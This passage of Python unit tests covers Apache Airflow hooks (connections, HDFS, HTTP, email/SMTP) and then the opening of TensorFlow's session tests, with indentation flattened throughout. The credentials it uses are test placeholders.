client = FakeSnakeBiteClient()
return client
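# Connection resolution tests: connections can be defined via AIRFLOW_CONN_*
# environment variables (in URI form) or stored in the metadata database; the
# environment variable wins when both exist.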
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
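# WebHDFSHook construction tests; the HDFSHook tests further below are skipped
# when the optional snakebite dependency is not installed.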
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
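# HttpHook tests: base_url is built from the connection's schema and host, and
# a scheme already present in the host field is kept as-is.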
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
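# Email backend tests: with email.EMAIL_BACKEND set, the configured callable
# (the send_email_test mock below) is used instead of the default SMTP backend.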
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
        # login must not be attempted when no SMTP credentials are configured
        self.assertFalse(mock_smtp.return_value.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
session_test.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import random
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
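  # Each entry in ConfigProto.session_inter_op_thread_pool defines a separate
  # inter-op thread pool; RunOptions.inter_op_thread_pool selects one by index.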
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
      self.assertEqual(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
      self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
